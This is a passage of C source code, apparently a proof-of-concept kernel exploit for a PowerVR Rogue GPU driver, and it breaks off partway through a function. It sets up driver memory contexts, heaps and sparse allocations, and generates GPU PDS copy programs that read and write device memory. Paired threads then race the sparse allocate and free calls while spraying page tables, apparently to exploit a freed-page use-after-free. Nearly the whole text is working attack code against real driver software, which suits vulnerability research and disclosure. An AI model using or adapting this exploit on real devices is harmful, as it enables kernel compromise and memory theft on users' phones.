#define _GNU_SOURCE
#include <pthread.h>
#include <sched.h>
#include <poll.h>
#include <inttypes.h>
#include <err.h>
#include <assert.h>
#include <stdlib.h>
#include <stdint.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdbool.h>
#include <time.h>
#include <string.h>
#include <unistd.h>
#include <ctype.h>
#include <sys/mman.h>
#include <sys/ioctl.h>

#define __packed __attribute__((packed))

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})
#define MIN(a, b) ({       \
  typeof(a) a__ = (a);     \
  typeof(b) b__ = (b);     \
  (a__ < b__) ? a__ : b__; \
})

static uint64_t ts_to_u64(struct timespec *ts) {
  return ts->tv_sec * (uint64_t)1000000000 + ts->tv_nsec;
}
static uint64_t time_u64(void) {
  struct timespec ts;
  if (clock_gettime(CLOCK_MONOTONIC, &ts)) err(1, "clock_gettime");
  return ts_to_u64(&ts);
}

void pin_to(int cpu) {
  cpu_set_t cset;
  CPU_ZERO(&cset);
  CPU_SET(cpu, &cset);
  SYSCHK(sched_setaffinity(0, sizeof(cpu_set_t), &cset));
}

static void hexdump_addr(void *_data, size_t byte_count, uint64_t base_addr, int pad) {
  //printf("hexdump(%010"PRIx64", 0x%lx)\n", base_addr, (unsigned long)byte_count);
  bool last_was_all_zeroes = false;
  for (unsigned long byte_offset = 0; byte_offset < byte_count;) {
    unsigned char *orig_bytes = ((unsigned char*)_data) + byte_offset;
    unsigned char bytes[16];
#if 0
    if (!try_memcpy(bytes, orig_bytes, 16)) {
      for (int padi=0; padi<pad; padi++) putchar(' ');
      puts("** inaccessible page **");
      byte_offset = (byte_offset + 0x1000) & ~0xff0UL;
      continue;
    }
#else
    memcpy(bytes, orig_bytes, 16);
#endif
    unsigned long line_bytes = (byte_count - byte_offset > 16) ?
            16 : (byte_count - byte_offset);

    bool all_zeroes = true;
    for (int i=0; i<line_bytes; i++) {
      if (bytes[i] != 0)
        all_zeroes = false;
    }

    if (all_zeroes) {
      if (!last_was_all_zeroes) {
        for (int padi=0; padi<pad; padi++) putchar(' ');
        puts("[ zeroes ]");
      }
      last_was_all_zeroes = true;
      byte_offset += line_bytes;
      continue;
    }
    last_was_all_zeroes = false;

    char line[1000];
    char *linep = line;
    for (int padi=0; padi<pad; padi++) *(linep++) = ' ';
    linep += sprintf(linep, "%010"PRIx64"  ", base_addr + byte_offset);
    for (int i=0; i<16; i++) {
      if (i >= line_bytes) {
        linep += sprintf(linep, "   ");
      } else {
        linep += sprintf(linep, "%02hhx ", bytes[i]);
      }
    }
    linep += sprintf(linep, " |");
    for (int i=0; i<line_bytes; i++) {
      if (isalnum(bytes[i]) || ispunct(bytes[i]) || bytes[i] == ' ') {
        *(linep++) = bytes[i];
      } else {
        *(linep++) = '.';
      }
    }
    linep += sprintf(linep, "|");
    puts(line);
    byte_offset += 16;
  }
}





/* =====================   BRIDGE   ===================== */
static int gpu_fd;

#define DRM_IOCTL_PVR_SRVKM_INIT 0x40046445
#define PVR_SRVKM_SERVICES_INIT  1
#define PVR_SRVKM_SYNC_INIT 2
struct drm_pvr_srvkm_init_data {
	uint32_t init_module;
};
static void srvkm_init(int fd, int mode) {
  struct drm_pvr_srvkm_init_data data = { .init_module = mode };
  SYSCHK(ioctl(fd, DRM_IOCTL_PVR_SRVKM_INIT, &data));
}

struct drm_pvr_srvkm_cmd {
  uint32_t bridge_id;
  uint32_t bridge_func_id;
  uint64_t in_data_ptr;
  uint64_t out_data_ptr;
  uint32_t in_data_size;
  uint32_t out_data_size;
};
#define DRM_IOCTL_PVR_SRVKM_CMD 0xc0206440

static int driver_cmd(int bridge_id, int bridge_func_id, void *in_data, void *out_data, int in_size, int out_size) {
  struct drm_pvr_srvkm_cmd cmd = {
    .bridge_id = bridge_id,
    .bridge_func_id = bridge_func_id,
    .in_data_ptr = (unsigned long)in_data,
    .out_data_ptr = (unsigned long)out_data,
    .in_data_size = in_size,
    .out_data_size = out_size
  };
  return ioctl(gpu_fd, DRM_IOCTL_PVR_SRVKM_CMD, &cmd);
}
#define do_driver_cmd_noerror(bridge_id, bridge_func_id) ({                                \
    SYSCHK(driver_cmd((bridge_id), (bridge_func_id), &in, &out, sizeof(in), sizeof(out))); \
})
#define do_driver_cmd(bridge_id, bridge_func_id) ({                                        \
    do_driver_cmd_noerror((bridge_id), (bridge_func_id));                                  \
    if (out.eError != 0) errx(1, #bridge_func_id " eError %u", out.eError);                \
})

typedef void *IMG_HANDLE;
typedef int PVRSRV_ERROR;
typedef uint64_t IMG_DEV_VIRTADDR;
typedef uint64_t IMG_DEVMEM_SIZE_T;
typedef uint64_t IMG_DEVMEM_ALIGN_T;
typedef uint64_t IMG_DEVMEM_OFFSET_T;
typedef uint32_t IMG_DEVMEM_LOG2ALIGN_T;
typedef unsigned int	IMG_UINT;
typedef int				IMG_INT;
typedef uint8_t			IMG_UINT8,	*IMG_PUINT8;
typedef uint8_t			IMG_BYTE,	*IMG_PBYTE;
typedef int8_t			IMG_INT8;
typedef char			IMG_CHAR,	*IMG_PCHAR;
typedef uint16_t		IMG_UINT16,	*IMG_PUINT16;
typedef int16_t			IMG_INT16;
typedef uint32_t		IMG_UINT32,	*IMG_PUINT32;
typedef int32_t			IMG_INT32,	*IMG_PINT32;
typedef uint64_t		IMG_UINT64,	*IMG_PUINT64;
typedef int64_t			IMG_INT64;
typedef IMG_UINT64 PVRSRV_MEMALLOCFLAGS_T;
typedef int32_t PVRSRV_FENCE;
typedef int32_t PVRSRV_TIMELINE;
typedef IMG_UINT32      IMG_PID;

#define PVRSRV_BRIDGE_MM 6UL
#define PVRSRV_BRIDGE_RGXCMP 129UL

#define PVRSRV_MEMALLOCFLAG_GPU_UNCACHED_WC      (0ULL<<8)
#define PVRSRV_MEMALLOCFLAG_GPU_UNCACHED         (1ULL<<8)
#define PVRSRV_MEMALLOCFLAG_GPU_CACHE_COHERENT   (2ULL<<8)
#define PVRSRV_MEMALLOCFLAG_GPU_CACHE_INCOHERENT (3ULL<<8)

#define PVRSRV_MEMALLOCFLAG_CPU_UNCACHED_WC      (0ULL<<11)
#define PVRSRV_MEMALLOCFLAG_CPU_UNCACHED         (1ULL<<11)
#define PVRSRV_MEMALLOCFLAG_CPU_CACHE_COHERENT   (2ULL<<11)
#define PVRSRV_MEMALLOCFLAG_CPU_CACHE_INCOHERENT (3ULL<<11)

#define PVRSRV_MEMALLOCFLAG_CPU_CACHE_CLEAN       (1ULL<<19)

#define PVRSRV_BRIDGE_MM_DEVMEMINTRESERVERANGE2 47
typedef struct PVRSRV_BRIDGE_IN_DEVMEMINTRESERVERANGE2_TAG
{
	IMG_DEV_VIRTADDR sAddress;
	IMG_DEVMEM_SIZE_T uiLength;
	IMG_HANDLE hDevmemServerHeap;
	PVRSRV_MEMALLOCFLAGS_T uiFlags;
} __packed PVRSRV_BRIDGE_IN_DEVMEMINTRESERVERANGE2;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMINTRESERVERANGE2_TAG
{
	IMG_HANDLE hReservation;
	PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMINTRESERVERANGE2;
static IMG_HANDLE create_reservation(IMG_HANDLE heap, uint64_t base, uint64_t len) {
  PVRSRV_BRIDGE_IN_DEVMEMINTRESERVERANGE2 in = {
    .sAddress = base,
    .uiLength = len,
    .hDevmemServerHeap = heap,
    .uiFlags = 0xff/*CPU+GPU R+W*/ | PVRSRV_MEMALLOCFLAG_GPU_UNCACHED | PVRSRV_MEMALLOCFLAG_CPU_UNCACHED_WC
  };
  PVRSRV_BRIDGE_OUT_DEVMEMINTRESERVERANGE2 out = {};
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_DEVMEMINTRESERVERANGE2);
  return out.hReservation;
}

#define PVRSRV_BRIDGE_RGXCMP_RGXCREATECOMPUTECONTEXT 0
typedef struct PVRSRV_BRIDGE_IN_RGXCREATECOMPUTECONTEXT_TAG
{
	IMG_UINT64 ui64RobustnessAddress;
	IMG_HANDLE hPrivData;
	IMG_BYTE *pui8FrameworkCmd;
	IMG_BYTE *pui8StaticComputeContextState;
	IMG_UINT32 ui32ContextFlags;
	IMG_UINT32 ui32FrameworkCmdize;
	IMG_UINT32 ui32MaxDeadlineMS;
	IMG_UINT32 ui32PackedCCBSizeU88;
	IMG_UINT32 ui32Priority;
	IMG_UINT32 ui32StaticComputeContextStateSize;
} __packed PVRSRV_BRIDGE_IN_RGXCREATECOMPUTECONTEXT;
typedef struct PVRSRV_BRIDGE_OUT_RGXCREATECOMPUTECONTEXT_TAG
{
	IMG_HANDLE hComputeContext;
	PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_RGXCREATECOMPUTECONTEXT;

#define PVRSRV_BRIDGE_RGXCMP_RGXKICKCDM2 5
typedef struct PVRSRV_BRIDGE_IN_RGXKICKCDM2_TAG
{
	IMG_UINT64 ui64DeadlineInus;
	IMG_HANDLE hComputeContext;
	IMG_UINT32 *pui32ClientUpdateOffset;
	IMG_UINT32 *pui32ClientUpdateValue;
	IMG_UINT32 *pui32SyncPMRFlags;
	IMG_BYTE *pui8DMCmd;
	IMG_CHAR *puiUpdateFenceName;
	IMG_HANDLE *phClientUpdateUFOSyncPrimBlock;
	IMG_HANDLE *phSyncPMRs;
	PVRSRV_FENCE hCheckFenceFd;
	PVRSRV_TIMELINE hUpdateTimeline;
	IMG_UINT32 ui32ClientUpdateCount;
	IMG_UINT32 ui32CmdSize;
	IMG_UINT32 ui32ExtJobRef;
	IMG_UINT32 ui32NumOfWorkgroups;
	IMG_UINT32 ui32NumOfWorkitems;
	IMG_UINT32 ui32PDumpFlags;
	IMG_UINT32 ui32SyncPMRCount;
} __packed PVRSRV_BRIDGE_IN_RGXKICKCDM2;
typedef struct PVRSRV_BRIDGE_OUT_RGXKICKCDM2_TAG
{
	PVRSRV_ERROR eError;
	PVRSRV_FENCE hUpdateFence;
} __packed PVRSRV_BRIDGE_OUT_RGXKICKCDM2;

#define PVRSRV_BRIDGE_MM_DEVMEMINTCTXCREATE 15
typedef struct PVRSRV_BRIDGE_IN_DEVMEMINTCTXCREATE_TAG
{
        int bbKernelMemoryCtx;
} __packed PVRSRV_BRIDGE_IN_DEVMEMINTCTXCREATE;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMINTCTXCREATE_TAG
{
        IMG_HANDLE hDevMemServerContext;
        IMG_HANDLE hPrivData;
        int eError;
        unsigned int ui32CPUCacheLineSize;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMINTCTXCREATE;
static IMG_HANDLE create_device_memory_context(IMG_HANDLE *priv_data_out) {
  PVRSRV_BRIDGE_IN_DEVMEMINTCTXCREATE in = { .bbKernelMemoryCtx = false };
  PVRSRV_BRIDGE_OUT_DEVMEMINTCTXCREATE out = {};
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_DEVMEMINTCTXCREATE);
  *priv_data_out = out.hPrivData;
  return out.hDevMemServerContext;
}

#define PVRSRV_BRIDGE_MM_DEVMEMINTHEAPCREATE 17
typedef struct PVRSRV_BRIDGE_IN_DEVMEMINTHEAPCREATE_TAG
{
  IMG_DEV_VIRTADDR sHeapBaseAddr;
  IMG_DEVMEM_SIZE_T uiHeapLength;
  IMG_HANDLE hDevmemCtx;
  IMG_UINT32 ui32Log2DataPageSize;
} __packed PVRSRV_BRIDGE_IN_DEVMEMINTHEAPCREATE;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMINTHEAPCREATE_TAG
{
  IMG_HANDLE hDevmemHeapPtr;
  PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMINTHEAPCREATE;
static IMG_HANDLE create_heap(IMG_HANDLE mem_ctx, uint64_t base_addr, uint64_t length, unsigned int page_size_log2) {
  PVRSRV_BRIDGE_IN_DEVMEMINTHEAPCREATE in = {
    .sHeapBaseAddr = base_addr,
    .uiHeapLength = length,
    .hDevmemCtx = mem_ctx,
    .ui32Log2DataPageSize = page_size_log2
  };
  PVRSRV_BRIDGE_OUT_DEVMEMINTHEAPCREATE out = {};
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_DEVMEMINTHEAPCREATE);
  return out.hDevmemHeapPtr;
}

#define PVRSRV_BRIDGE_MM_PHYSMEMNEWRAMBACKEDLOCKEDPMR     10
typedef struct PVRSRV_BRIDGE_IN_PHYSMEMNEWRAMBACKEDLOCKEDPMR_TAG
{
  IMG_DEVMEM_SIZE_T uiChunkSize;
  IMG_DEVMEM_SIZE_T uiSize;
  IMG_UINT32 *pui32MappingTable;
  const IMG_CHAR *puiAnnotation;
  IMG_UINT32 ui32AnnotationLength;
  IMG_UINT32 ui32Log2PageSize;
  IMG_UINT32 ui32NumPhysChunks;
  IMG_UINT32 ui32NumVirtChunks;
  IMG_UINT32 ui32PDumpFlags;
  IMG_PID ui32PID;
  PVRSRV_MEMALLOCFLAGS_T uiFlags;
} __packed PVRSRV_BRIDGE_IN_PHYSMEMNEWRAMBACKEDLOCKEDPMR;
typedef struct PVRSRV_BRIDGE_OUT_PHYSMEMNEWRAMBACKEDLOCKEDPMR_TAG
{
  IMG_HANDLE hPMRPtr;
  PVRSRV_ERROR eError;
  PVRSRV_MEMALLOCFLAGS_T uiOutFlags;
} __packed PVRSRV_BRIDGE_OUT_PHYSMEMNEWRAMBACKEDLOCKEDPMR;
// non-sparse, locked
static IMG_HANDLE alloc_pmr_sparse(uint64_t size) {
  uint32_t mapping_table[1] = { 0 }; // virtual chunk idx by physical chunk idx ?
  uint64_t heap_idx = 1; // cpu-local
  uint64_t cache_flags = PVRSRV_MEMALLOCFLAG_CPU_CACHE_INCOHERENT | PVRSRV_MEMALLOCFLAG_GPU_UNCACHED | PVRSRV_MEMALLOCFLAG_CPU_CACHE_CLEAN;
  PVRSRV_BRIDGE_IN_PHYSMEMNEWRAMBACKEDLOCKEDPMR in = {
    .uiChunkSize = 0x1000,
    .uiSize = size,
    .pui32MappingTable = mapping_table,
    .puiAnnotation = "foobar",
    .ui32AnnotationLength = 7,
    .ui32Log2PageSize = 12,
    .ui32NumPhysChunks = 0, // ?
    .ui32NumVirtChunks = size/0x1000,
    .ui32PDumpFlags = 0,
    .ui32PID = 0,
    .uiFlags = 0xf/*GPU RW, remap ok*/ | 0xf0/*CPU RW, remap ok*/ | cache_flags |
               (/*kernel-mappable*/0<<14) | (/*on-demand*/0<<15) | (/*SVM*/0<<17) |
               (/*sparse no dummy*/0<<18) |
               (/*zero backing*/0<<20) | (heap_idx << 59)
  };
  PVRSRV_BRIDGE_OUT_PHYSMEMNEWRAMBACKEDLOCKEDPMR out = {};
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_PHYSMEMNEWRAMBACKEDLOCKEDPMR);
  return out.hPMRPtr;
}
static IMG_HANDLE alloc_pmr(uint64_t alloc_size, uint64_t extra_flags) {
  uint32_t mapping_table[1] = { 0 }; // virtual chunk idx by physical chunk idx ?
  uint64_t heap_idx = 1; // cpu-local
  uint64_t cpu_cache_mode = 0;
  uint64_t gpu_cache_mode = 1;
  PVRSRV_BRIDGE_IN_PHYSMEMNEWRAMBACKEDLOCKEDPMR in = {
    .uiChunkSize = alloc_size,
    .uiSize = alloc_size,
    .pui32MappingTable = mapping_table,
    .puiAnnotation = "foobar",
    .ui32AnnotationLength = 7,
    .ui32Log2PageSize = 12,
    .ui32NumPhysChunks = 1, // ?
    .ui32NumVirtChunks = 1,
    .ui32PDumpFlags = 0,
    .ui32PID = 0,
    .uiFlags = 0xf/*GPU RW, remap ok*/ | 0xf0/*CPU RW, remap ok*/ | extra_flags |
               (/*kernel-mappable*/0<<14) | (/*on-demand*/0<<15) | (/*SVM*/0<<17) |
               (/*sparse no dummy*/0<<18) |
               (/*zero backing*/0<<20) | (heap_idx << 59)
  };
  PVRSRV_BRIDGE_OUT_PHYSMEMNEWRAMBACKEDLOCKEDPMR out = {};
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_PHYSMEMNEWRAMBACKEDLOCKEDPMR);
  return out.hPMRPtr;
}
static IMG_HANDLE alloc_pmr_uncached(uint64_t alloc_size) {
  return alloc_pmr(alloc_size, PVRSRV_MEMALLOCFLAG_CPU_UNCACHED_WC | PVRSRV_MEMALLOCFLAG_GPU_UNCACHED | PVRSRV_MEMALLOCFLAG_CPU_CACHE_CLEAN);
}

#define PVRSRV_BRIDGE_MM_DEVMEMINTMAPPMR2     49
typedef struct PVRSRV_BRIDGE_IN_DEVMEMINTMAPPMR2_TAG
{
  IMG_HANDLE hDevmemServerHeap;
  IMG_HANDLE hPMR;
  IMG_HANDLE hReservation;
} __packed PVRSRV_BRIDGE_IN_DEVMEMINTMAPPMR2;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMINTMAPPMR2_TAG
{
  PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMINTMAPPMR2;
static void map_pmr(IMG_HANDLE heap, IMG_HANDLE pmr, IMG_HANDLE resv) {
  PVRSRV_BRIDGE_IN_DEVMEMINTMAPPMR2 in = { .hDevmemServerHeap = heap, .hPMR = pmr, .hReservation = resv };
  PVRSRV_BRIDGE_OUT_DEVMEMINTMAPPMR2 out;
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_DEVMEMINTMAPPMR2);
}

#define PVRSRV_BRIDGE_MM_DEVMEMINTUNMAPPMR2     50
typedef struct PVRSRV_BRIDGE_IN_DEVMEMINTUNMAPPMR2_TAG
{
  IMG_HANDLE hReservation;
} __packed PVRSRV_BRIDGE_IN_DEVMEMINTUNMAPPMR2;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMINTUNMAPPMR2_TAG
{
  PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMINTUNMAPPMR2;
static void unmap_pmr(IMG_HANDLE res) {
  PVRSRV_BRIDGE_IN_DEVMEMINTUNMAPPMR2 in = { .hReservation = res };
  PVRSRV_BRIDGE_OUT_DEVMEMINTUNMAPPMR2 out;
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_DEVMEMINTUNMAPPMR2);
}

#define PVRSRV_BRIDGE_MM_CHANGESPARSEMEM2     46
typedef struct PVRSRV_BRIDGE_IN_CHANGESPARSEMEM2_TAG
{
  IMG_UINT64 ui64CPUVAddr;
  IMG_HANDLE hPMR;
  IMG_HANDLE hReservation;
  IMG_HANDLE hSrvDevMemHeap;
  IMG_UINT32 *pui32AllocPageIndices;
  IMG_UINT32 *pui32FreePageIndices;
  IMG_UINT32 ui32AllocPageCount;
  IMG_UINT32 ui32FreePageCount;
  IMG_UINT32 ui32SparseFlags;
} __packed PVRSRV_BRIDGE_IN_CHANGESPARSEMEM2;
typedef struct PVRSRV_BRIDGE_OUT_CHANGESPARSEMEM2_TAG
{
  PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_CHANGESPARSEMEM2;





/* =====================   FWIF   ===================== */
/* CDM registers for ctx switch. */
struct rogue_fwif_cdm_regs_cswitch {
   uint64_t cdm_context_pds0; //data_addr, code_addr
   uint64_t cdm_context_pds1; //pds_seq_dep, usc_seq_dep, target, unified_size, common_shared, common_size, temp_size, data_size, fence
   uint64_t cdm_terminate_pds; //data_addr, code_addr
   uint64_t cdm_terminate_pds1; //pds_seq_dep, usc_seq_dep, target, unified_size, common_shared, common_size, temp_size, data_size, fence

   /* CDM resume controls. */
   uint64_t cdm_resume_pds0; // data_addr, code_addr
   uint64_t cdm_context_pds0_b; // ?
   uint64_t cdm_resume_pds0_b; // data_addr, code_addr
};

struct rogue_fwif_cmd_compute {
// 0x00
  // rogue_fwif_cmd_common
  uint32_t frame_num; // zero
  uint32_t pad4;
// 0x08
  // rogue_fwif_cdm_regs
  uint64_t tpu_border_colour_table; // address shifted by 2; not accessed
// 0x10
  uint64_t cdm_cb_queue_maybe_zero;
  uint64_t cdm_cb_base_maybe_zero;
// 0x20
  uint64_t cdm_cb_maybe;
  uint64_t cdm_context_state_base_addr_maybe; // always 16B-aligned
// 0x30
  uint32_t tpu_maybe; // always 0x21 or 0x25
  uint32_t cdm_resume_pds1_maybe; // ff800: MaxComputeSharedSizeOnResume; probably a CDM_CONTEXT_PDS1 or CDM_TERMINATE_PDS1; I guess cdm_resume_pds1
  uint32_t some_flags_maybe;
  uint32_t pad3c;
};






/* =====================   PDS   ===================== */
#define PVR_TYPE_OPCODE_SHIFT 28U
#define PVR_TYPE_OPCODE_SP_SHIFT 23U
#define PVR_TYPE_OPCODEB_SHIFT 29U

/* Instruction type C */
#define PVR_ROGUE_PDSINST_OPCODEC_MASK (0x0000000FU)
/* Umbrella OpcodeSP instructions*/
#define PVR_ROGUE_PDSINST_OPCODEC_SP UINT32_C(0x0000000d)

#define INSN_SP(opcode, rest) (                             \
  (PVR_ROGUE_PDSINST_OPCODEC_SP << PVR_TYPE_OPCODE_SHIFT) | \
  ((opcode) << PVR_TYPE_OPCODE_SP_SHIFT) |                  \
  (rest)                                                    \
)

/* Wait read or write data operations to complete. */
#define PVR_ROGUE_PDSINST_OPCODESP_WDF UINT32_C(0x00000002)
#define INSN_WDF() INSN_SP(PVR_ROGUE_PDSINST_OPCODESP_WDF, 0)

/* Halt execution (program termination). */
#define PVR_ROGUE_PDSINST_OPCODESP_HALT UINT32_C(0x00000006)
#define INSN_HALT() INSN_SP(PVR_ROGUE_PDSINST_OPCODESP_HALT, 0)

/* Data Load from memory. */
#define PVR_ROGUE_PDSINST_OPCODESP_LD UINT32_C(0x00000000)
#define PVR_ROGUE_PDSINST_LD_SRC0_SHIFT (0U)
#define PVR_ROGUE_PDSINST_LD_LD_SRC0_CMODE_CACHED (UINT64_C(0x0000000000000000))
#define PVR_ROGUE_PDSINST_LD_LD_SRC0_CMODE_BYPASS (UINT64_C(0x0000100000000000))
#define PVR_ROGUE_PDSINST_LD_LD_SRC0_CMODE_FORCE_LINE_FILL (UINT64_C(0x0000200000000000))
#define PVR_ROGUE_PDSINST_LD_LD_SRC0_SLCMODE_BYPASS (UINT64_C(0x0000000000000000))
#define PVR_ROGUE_PDSINST_LD_LD_SRC0_SLCMODE_CACHED (UINT64_C(0x4000000000000000))
#define PVR_ROGUE_PDSINST_LD_LD_SRC0_SLCMODE_CACHED_RD_NA (UINT64_C(0xc000000000000000))
#define INSN_LD(srcaddr) INSN_SP(PVR_ROGUE_PDSINST_OPCODESP_LD, ((srcaddr) << PVR_ROGUE_PDSINST_LD_SRC0_SHIFT))

/* Data Store to memory. */
#define PVR_ROGUE_PDSINST_OPCODESP_ST UINT32_C(0x00000001)
#define PVR_ROGUE_PDSINST_ST_SRC0_SHIFT (0U)
#define PVR_ROGUE_PDSINST_ST_ST_SRC0_SLCMODE_WRITE_THROUGH (UINT64_C(0x0000000000000000))
#define PVR_ROGUE_PDSINST_ST_ST_SRC0_SLCMODE_WRITE_BACK (UINT64_C(0x4000000000000000))
#define PVR_ROGUE_PDSINST_ST_ST_SRC0_CMODE_WRITE_THROUGH (UINT64_C(0x0000000000000000))
#define PVR_ROGUE_PDSINST_ST_ST_SRC0_CMODE_WRITE_BACK (UINT64_C(0x0000100000000000))
#define PVR_ROGUE_PDSINST_ST_ST_SRC0_CMODE_LAZY_WRITE_BACK (UINT64_C(0x0000200000000000))
#define INSN_ST(srcaddr) INSN_SP(PVR_ROGUE_PDSINST_OPCODESP_ST, ((srcaddr) << PVR_ROGUE_PDSINST_ST_SRC0_SHIFT))

/*
 * code_and_data_page: one 4K page we can fill with instructions and data.
 */
void generate_pds_memcpy_kernel(void *code_and_data_page, uint64_t copy_dest_addr, uint64_t copy_src_addr, size_t copy_len) {
  assert((copy_src_addr & 16) == 0);
  assert(copy_dest_addr % 4 == 0);
  assert(copy_len % 8 == 0);
  
  size_t num_copies = (copy_len+15) / 16; // can load max 56 bytes or store 60 bytes at once
  assert(num_copies <= 0x7f/2); // maximum number of constants (according to mesa)
  assert(num_copies <= 0x20); // maximum number of constants (my guess, but unclear, maybe i was just hitting some timeout or something else...)

  memset(code_and_data_page, '\0', 0x1000);

  size_t insn_idx = 0;
  uint32_t *insn = code_and_data_page;
  uint64_t *cons = (void*)(((uint8_t*)code_and_data_page) + 0x800);
  uint64_t *con = cons;

  for (size_t i = 0; i < num_copies; i++) {
    uint64_t src = copy_src_addr + i * 16;
    uint64_t dst = copy_dest_addr + i * 16;
    uint64_t num_dwords = MIN(16, copy_len - i * 16) / 4;

    *(insn++) = INSN_LD(/*cons-con*/con-cons); /* load from memory into temps */
    *(con++) = src | (num_dwords << 40) | PVR_ROGUE_PDSINST_LD_LD_SRC0_CMODE_BYPASS | PVR_ROGUE_PDSINST_LD_LD_SRC0_SLCMODE_BYPASS;
    *(insn++) = INSN_WDF(); /* wait for preceding LD */
    *(insn++) = INSN_ST(/*cons-con*/con-cons); /* store from temp to memory */
    *(con++) = dst | (num_dwords << 40) | PVR_ROGUE_PDSINST_ST_ST_SRC0_CMODE_WRITE_THROUGH | PVR_ROGUE_PDSINST_ST_ST_SRC0_SLCMODE_WRITE_THROUGH;
    *(insn++) = INSN_WDF(); /* wait for preceding ST */
  }
  *(insn++) = INSN_WDF(); /* wait for stores */
  *(insn++) = INSN_HALT(); /* program end */
  assert((char*)insn - (char*)code_and_data_page <= 0x800);
  assert((char*)con - (char*)cons <= 127*16);
}

void generate_pds_memcpy(uint32_t *cdm_commands_map,
        unsigned char *code_and_data_pages, uint64_t code_and_data_pages_pdsaddr,
        uint64_t copy_dest_addr, uint64_t copy_src_addr, size_t copy_len) {
  while (copy_len) {
    size_t step_len = MIN(0x200, copy_len);

    generate_pds_memcpy_kernel(code_and_data_pages, copy_dest_addr, copy_src_addr, step_len);

    *(cdm_commands_map++) = (0U << 30) | 2 | (127<<2) | (0xfU<<8); // KERNEL0, pds_data_size=127*16=2032, pds_temp_size=max
    *(cdm_commands_map++) = (code_and_data_pages_pdsaddr + 0x800) | (1U<<2); // pds_res + 0x800
    *(cdm_commands_map++) = (code_and_data_pages_pdsaddr); // pds_res
    *(cdm_commands_map++) = 1; // x
    *(cdm_commands_map++) = 1; // y
    *(cdm_commands_map++) = 1; // z
    *(cdm_commands_map++) = (1U<<27); // KERNEL8

    code_and_data_pages += 0x1000;
    code_and_data_pages_pdsaddr += 0x1000;
    copy_dest_addr += step_len;
    copy_src_addr += step_len;
    copy_len -= step_len;
  }
  *(cdm_commands_map++) = 2U << 30; // STREAM_TERMINATE
}




#define PMR_LEN 0x200000

static IMG_HANDLE heap_general;
static IMG_HANDLE source_res;
static IMG_HANDLE source_pmr;

static volatile int dump_me = 0;
static void *preempt_me_thread_fn(void *dummy) {
  pin_to(0); // run on a shared slow A53 core

  struct sched_param sp = { .sched_priority = 0 };
  SYSCHK(sched_setscheduler(0, SCHED_IDLE, &sp));

  IMG_UINT32 change_indices[PMR_LEN/0x1000];
  for (int i=0; i<PMR_LEN/0x1000; i++)
    change_indices[i] = i;

  while (1) {
    //printf("setting allocated\n");
    {
      PVRSRV_BRIDGE_IN_CHANGESPARSEMEM2 in = {
        .hPMR = source_pmr,
        .hReservation = source_res,
        .hSrvDevMemHeap = heap_general,
        .pui32AllocPageIndices = change_indices,
        .ui32AllocPageCount = sizeof(change_indices)/sizeof(change_indices[0]),
        .ui32SparseFlags = 1/*SPARSE_RESIZE_ALLOC*/,
      };
      PVRSRV_BRIDGE_OUT_CHANGESPARSEMEM2 out;
      uint64_t ts1 = time_u64();
      do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_CHANGESPARSEMEM2);
      uint64_t ts2 = time_u64();
      //printf("alloc %"PRIu64"\n", ts2-ts1);
    }
    //printf("setting freed\n");
    {
      PVRSRV_BRIDGE_IN_CHANGESPARSEMEM2 in = {
        .hPMR = source_pmr,
        .hReservation = source_res,
        .hSrvDevMemHeap = heap_general,
        .pui32FreePageIndices = change_indices,
        .ui32FreePageCount = sizeof(change_indices)/sizeof(change_indices[0]),
        .ui32SparseFlags = 2/*SPARSE_RESIZE_FREE*/,
      };
      PVRSRV_BRIDGE_OUT_CHANGESPARSEMEM2 out;
      uint64_t ts1 = time_u64();
      dump_me = 1;
      do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_CHANGESPARSEMEM2);
      dump_me = 0;
      uint64_t ts2 = time_u64();
      //printf("free  %"PRIu64"\n", ts2-ts1);
    }
  }

#if 0

#endif
}

// Flag set by preempt_thread_fn() when main() should start racing into the race
// window.
// Flag unset by main() when it is done with a race attempt.
static volatile int dumpable_preempted = 0;

static void *preempter_thread_fn(void *dummy) {
  pin_to(0); // run on a shared slow A53 core

#define CACHE_FLUSH_LEN_PREEMPTER (1024*1024*8)
  unsigned char *cache_flush_area = malloc(CACHE_FLUSH_LEN_PREEMPTER);
  if (cache_flush_area == NULL)
    errx(1, "malloc");

  while (1) {
    if (dump_me) {
      // try to flush page poison to memory
      memset(cache_flush_area, 'F', CACHE_FLUSH_LEN_PREEMPTER);

      // allocate a bunch of page tables
      volatile char *pts = SYSCHK(mmap(NULL, 512 * 512 * 0x1000UL, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0));
      for (unsigned long i=0; i<512; i++) {
        pts[i * 512 * 0x1000];
      }

      dumpable_preempted = 1;

      // Try to keep preempt_me_thread_fn() preempted until main() tells us that
      // it is done with a race attempt.
      while (dumpable_preempted) /*spin*/;
      SYSCHK(munmap((void*)pts, 512 * 512 * 0x1000UL));
    }
